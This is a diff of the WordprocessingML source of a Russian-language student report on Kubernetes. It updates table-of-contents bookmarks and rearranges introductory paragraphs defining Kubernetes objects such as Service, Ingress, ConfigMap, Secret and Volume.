             <w:webHidden/>
           </w:rPr>
           <w:t>18</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC1"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231834658" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>П</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>риложение А</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834658 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>19</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC1"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231834659" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>Приложение</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>Б</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231834659 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>20</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2354,7 +2494,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:bookmarkStart w:id="1" w:name="_Toc518292916"/>
-      <w:bookmarkStart w:id="2" w:name="_Toc231774161"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc231834629"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>ВВЕДЕНИЕ</w:t>
@@ -2369,11 +2509,13 @@
       </w:pPr>
       <w:bookmarkStart w:id="3" w:name="_Toc231073600"/>
       <w:bookmarkStart w:id="4" w:name="_Toc231774162"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc231834630"/>
       <w:r>
         <w:t>Цель работы</w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
       <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2399,98 +2541,102 @@
       <w:pPr>
         <w:pStyle w:val="Beginingtitlelist"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc231073601"/>
-      <w:bookmarkStart w:id="6" w:name="_Toc231774163"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc231073601"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc231774163"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc231834631"/>
       <w:r>
         <w:t>Актуальность темы.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
       <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">В связи с трендом перехода от монолитной архитектуры к микросервисной и ростом популяронсти контейнеров, появился спрос на оркестровщики, которые дают функционал для управления большим числом независимых </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>docker</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">контейнеров. Самым популярным средством оркестровки контейнеров является </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">С точки зрения безопасности, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">позволяет централизованно управлять защитой </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">независимых контейнеров. Также </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>имеет изолированные компоненты, например для взаимодействий между контейнерами и хранения конфиденциальной информации.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Так как компоненты </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Kubernetes </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">имеют строгую спецификацию, то </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Beginingtitlelist"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc231073602"/>
-      <w:bookmarkStart w:id="8" w:name="_Toc231774164"/>
-      <w:r>
-        <w:t>Задачи</w:t>
-      </w:r>
       <w:bookmarkEnd w:id="7"/>
       <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">В связи с трендом перехода от монолитной архитектуры к микросервисной и ростом популяронсти контейнеров, появился спрос на оркестровщики, которые дают функционал для управления большим числом независимых </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>docker</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">контейнеров. Самым популярным средством оркестровки контейнеров является </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">С точки зрения безопасности, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">позволяет централизованно управлять защитой </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">независимых контейнеров. Также </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>имеет изолированные компоненты, например для взаимодействий между контейнерами и хранения конфиденциальной информации.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Так как компоненты </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Kubernetes </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">имеют строгую спецификацию, то </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc231073602"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc231774164"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc231834632"/>
+      <w:r>
+        <w:t>Задачи</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2663,12 +2809,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc231774165"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc231834633"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>ТЕОРЕТИЧЕСКИЕ ИССЛЕДОВАНИЯ</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2678,7 +2824,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc231774166"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc231834634"/>
       <w:r>
         <w:t>П</w:t>
       </w:r>
@@ -2700,7 +2846,7 @@
       <w:r>
         <w:t>и назначение оркестровки</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2792,7 +2938,7 @@
         </w:numPr>
         <w:ind w:left="0" w:firstLine="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc231774167"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc231834635"/>
       <w:r>
         <w:t xml:space="preserve">архитектура </w:t>
       </w:r>
@@ -2802,7 +2948,7 @@
         </w:rPr>
         <w:t>Kubernetes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2928,7 +3074,7 @@
         </w:numPr>
         <w:ind w:left="0" w:firstLine="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc231774168"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc231834636"/>
       <w:r>
         <w:t xml:space="preserve">Основные компоненты </w:t>
       </w:r>
@@ -2938,7 +3084,7 @@
         </w:rPr>
         <w:t>Kubernetes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3017,13 +3163,15 @@
         </w:numPr>
         <w:ind w:left="1571"/>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc231073607"/>
-      <w:bookmarkStart w:id="14" w:name="_Toc231774169"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc231073607"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc231774169"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc231834637"/>
       <w:r>
         <w:t>Главная нода</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3173,13 +3321,15 @@
       <w:pPr>
         <w:pStyle w:val="Beginingtitlelist"/>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc231073608"/>
-      <w:bookmarkStart w:id="16" w:name="_Toc231774170"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc231073608"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc231774170"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc231834638"/>
       <w:r>
         <w:t>Рабочая нода</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3275,16 +3425,18 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc231073609"/>
-      <w:bookmarkStart w:id="18" w:name="_Toc231774171"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc231073609"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc231774171"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc231834639"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Pod</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3319,8 +3471,9 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc231073610"/>
-      <w:bookmarkStart w:id="20" w:name="_Toc231774172"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc231073610"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc231774172"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc231834640"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3328,294 +3481,89 @@
         <w:lastRenderedPageBreak/>
         <w:t>Service</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
-      <w:bookmarkEnd w:id="20"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Service</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">абстракция, находящаяся над подами, которая обеспечивает коммуникацию между этими подами, а также имеет возможность выделить для нескольких подов статический </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>адресс.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Beginingtitlelist"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc231073611"/>
-      <w:bookmarkStart w:id="22" w:name="_Toc231774173"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Ingress</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="21"/>
-      <w:bookmarkEnd w:id="22"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Ingress</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">объект </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>API</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">который управляет внешним трафиком, а также маршрутизирует его к сервису ноды. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Ingress</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>позволяет оптимально распределить весь трафик по всем необходимым сервисам.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Beginingtitlelist"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc231073612"/>
-      <w:bookmarkStart w:id="24" w:name="_Toc231774174"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ConfigMap</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="23"/>
-      <w:bookmarkEnd w:id="24"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ConfigMap</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t>внешняя конфигурация приложения, которая служит для хранения настроек всего кластера.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ConfigMap </w:t>
-      </w:r>
-      <w:r>
-        <w:t>служит для хранения только публичной информации.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Beginingtitlelist"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc231073613"/>
-      <w:bookmarkStart w:id="26" w:name="_Toc231774175"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Secret</w:t>
-      </w:r>
       <w:bookmarkEnd w:id="25"/>
       <w:bookmarkEnd w:id="26"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Secret</w:t>
+      <w:bookmarkEnd w:id="27"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Service</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> – </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">объект кластера, который служит для хранения конфидециальных данных с возможностью их использования. Все данные </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>secrets</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">хранятся в </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ETCD</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>сервера в незашифрованном виде.</w:t>
+        <w:t xml:space="preserve">абстракция, находящаяся над подами, которая обеспечивает коммуникацию между этими подами, а также имеет возможность выделить для нескольких подов статический </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>адресс.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Beginingtitlelist"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc231073614"/>
-      <w:bookmarkStart w:id="28" w:name="_Toc231774176"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Volume</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="27"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="28" w:name="_Toc231073611"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc231774173"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc231834641"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="28"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Volume</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">объект </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">который служит для связи с внешними дисками машины ноды. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Volume</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">предназначен для локального хранения информации внутри ноды. Также объект </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Volume</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">находитя вне самого кластера </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Beginingtitlelist"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc231073615"/>
-      <w:bookmarkStart w:id="30" w:name="_Toc231774177"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Deployment</w:t>
-      </w:r>
       <w:bookmarkEnd w:id="29"/>
       <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Deployment - высокоуровневый объект, описывающий желаемое поведение группы подов и управляющий их жизненным циклом.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>API</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">который управляет внешним трафиком, а также маршрутизирует его к сервису ноды. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>позволяет оптимально распределить весь трафик по всем необходимым сервисам.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3625,16 +3573,201 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="31" w:name="_Toc231073616"/>
-      <w:bookmarkStart w:id="32" w:name="_Toc231774178"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>STS</w:t>
+      <w:bookmarkStart w:id="31" w:name="_Toc231073612"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc231774174"/>
+      <w:bookmarkStart w:id="33" w:name="_Toc231834642"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ConfigMap</w:t>
       </w:r>
       <w:bookmarkEnd w:id="31"/>
       <w:bookmarkEnd w:id="32"/>
+      <w:bookmarkEnd w:id="33"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ConfigMap</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>внешняя конфигурация приложения, которая служит для хранения настроек всего кластера.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ConfigMap </w:t>
+      </w:r>
+      <w:r>
+        <w:t>служит для хранения только публичной информации.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="34" w:name="_Toc231073613"/>
+      <w:bookmarkStart w:id="35" w:name="_Toc231774175"/>
+      <w:bookmarkStart w:id="36" w:name="_Toc231834643"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="34"/>
+      <w:bookmarkEnd w:id="35"/>
+      <w:bookmarkEnd w:id="36"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">объект кластера, который служит для хранения конфидециальных данных с возможностью их использования. Все данные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>secrets</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">хранятся в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ETCD</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>сервера в незашифрованном виде.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="37" w:name="_Toc231073614"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc231774176"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc231834644"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="37"/>
+      <w:bookmarkEnd w:id="38"/>
+      <w:bookmarkEnd w:id="39"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
